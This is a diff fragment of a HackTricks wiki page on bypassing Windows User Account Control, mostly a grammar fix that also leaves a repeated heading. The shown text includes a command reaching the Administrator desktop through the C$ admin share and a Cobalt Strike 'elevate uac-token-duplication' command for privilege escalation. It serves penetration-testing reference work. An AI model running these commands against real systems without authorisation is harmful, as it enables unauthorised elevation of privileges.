khaledalmaarii/HackTricks-wiki/windows-hardening/windows-security-controls/uac-user-account-control.md

 #Or you could just access it:
 dir \\127.0.0.1\c$\Users\Administrator\Desktop
 ```
 ### UAC bypass with cobalt strike

+Cobalt Strike techniques will only work if UAC is not set at its max security level.

+### UAC bypass with cobalt strike

-The Cobalt Strike techniques will only work if UAC is not set at it's max security level
+Cobalt Strike techniques will only work if UAC is not set at its max security level.
 ```bash
 # UAC bypass via token duplication
 elevate uac-token-duplication [listener_name]